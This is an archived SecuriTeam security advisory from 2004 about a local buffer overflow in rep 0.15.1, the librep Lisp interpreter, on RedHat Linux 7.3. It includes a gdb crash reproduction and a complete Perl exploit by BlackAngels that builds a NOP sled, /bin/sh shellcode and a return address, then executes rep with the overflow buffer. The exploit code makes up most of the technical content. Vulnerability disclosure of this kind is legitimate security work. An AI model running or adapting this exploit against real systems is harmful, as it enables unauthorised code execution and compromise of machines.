[UNIX] Local Buffer Overflow in REP (Long ARG)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/23/04
- Previous message: SecuriTeam: "[NT] Terminator 3 Broadcast Client Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 23 Mar 2004 20:40:13 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Local Buffer Overflow in REP (Long ARG)
------------------------------------------------------------------------
SUMMARY
rep stands for "Read, Eval, Print", the three main components of any Lisp
system. Librep is a dialect of Lisp, designed to be used both as an
extension language for applications, and for use as a general programming
language. A vulnerability in rep allows a local user to execute arbitrary
code.
DETAILS
Vulnerable Systems:
* RedHat Linux 7.3 kernel version 2.4.20, prior versions might also be
effected
* rep version 0.15.1
To exploit the vulnerability, simply input as first ARG a buffer string of
4081 bytes:
$ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'`
$ rep $BADBUFFER Segmentation fault
$ gdb rep
(gdb) r $BADBUFFER
Program received signal SIGSEGV, Segmentation fault.
0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9
(gdb) info reg esp
esp 0xbf414139 0xbf414139
Exploit Code:
#!/usr/bin/perl -w
# RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit
#
# Legal notes :
# The BlackAngels staff refuse all responsibilities for an incorrect
# or illegal use of this code or for eventual damages to others systems.
#
# For more information:
# [ http://www.blackangels.it ] - ( staff[at]blackangels.it )
$len = 4260;
$ret = 0xbf414139;
$nop = "\x90";
print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit";
print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20";
print "\n============================================================\n";
if (!$ARGV[0]) {
print "You must specify an offset [ Default = -1000 ] ...\n\n";
exit(-1);
}
my $offset = "$ARGV[0]";
$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
print "Trying to execute /bin/sh ...\n";
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("\nAddress: 0x", sprintf('%lx',($ret + $offset)), "\n");
print "\tRet: $ret + Offset: $offset\n\n";
$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
exec("/usr/bin/rep $buffer");
ADDITIONAL INFORMATION
The information has been provided by <mailto:staff@blackangels.it>
BlackAngels Staff.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Terminator 3 Broadcast Client Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
